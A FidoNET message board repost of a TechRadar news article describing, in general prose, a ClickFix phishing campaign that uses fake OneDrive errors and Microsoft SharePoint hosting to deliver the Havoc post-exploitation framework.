1. Forum
  2. FidoNET
  3. CONSPRCY

  • MS SharePoint hijacked to

    From Mike Powell@1:2320/105 to All on Tuesday, March 04, 2025 19:05:00
    Microsoft SharePoint hijacked to spread Havoc malware

    Date:
    Tue, 04 Mar 2025 14:23:00 +0000

    Description:
    Fake OneDrive errors are being used in brand new malware campaign

    FULL STORY ======================================================================
    - Security researchers spotted a new ClickFix campaign
    - The goal is to deploy the Havoc post-exploitation framework
    - The framework is hosted on a Microsoft SharePoint account

    Hackers have been seen abusing Microsoft SharePoint to distribute the Havoc post-exploitation framework in a new ClickFix phishing attack.

    Cybersecurity researchers Fortiguard Labs, who have been tracking the
    campaign since last year, highlighted how ClickFix is a type of scam weve probably all encountered at least once. Cybercriminals would hijack a
    website, and create an overlay that displays a fake error message (for
    example: Your browser is outdated, and to view the contents of the webpage,
    you need to update it). That fake message would prompt the victim into
    action, which usually concludes by downloading and running malware , or
    sharing sensitive information such as passwords or banking data.

    This campaign is similar, although requires a bit more activity from the victims side. The attack chain starts with a phishing email, carrying a restricted notice as a .HTML attachment. Running the attachment displays a
    fake error that says Failed to connect to OneDrive - update the DNS cache manually. The page also has a How to fix button that copies a PowerShell command to the Windows clipboard, and then displays a message on how to paste and run it.

    Rising threat of ClickFix

    Running this script then runs a second one, hosted on the attackers
    SharePoint server which, in turn, downloads a Python script that deploys the Havoc post-exploitation framework as a .DLL file.

    Havoc is a post-exploitation framework designed for advanced red teaming and adversary simulation, providing modular capabilities for stealthy command and control (C2) operations. It offers features like in-memory execution,
    encrypted communication, and evasion techniques to bypass modern security defenses.

    ClickFix has gotten insanely popular in these last couple of months. In late October last year, a new malware variant was observed compromising thousands
    of WordPress websites, installing a malicious plugin that would serve the ClickFix attack.

    Just a few weeks prior, researchers saw fake broken Google Meet calls, which was also a variant of the ClickFix attack.

    Via BleepingComputer

    ======================================================================
    Link to news story: https://www.techradar.com/pro/security/microsoft-sharepoint-hijacked-to-spread -havoc-malware

    $$
    --- SBBSecho 3.20-Linux
    * Origin: capitolcityonline.net * Telnet/SSH:2022/HTTP (1:2320/105)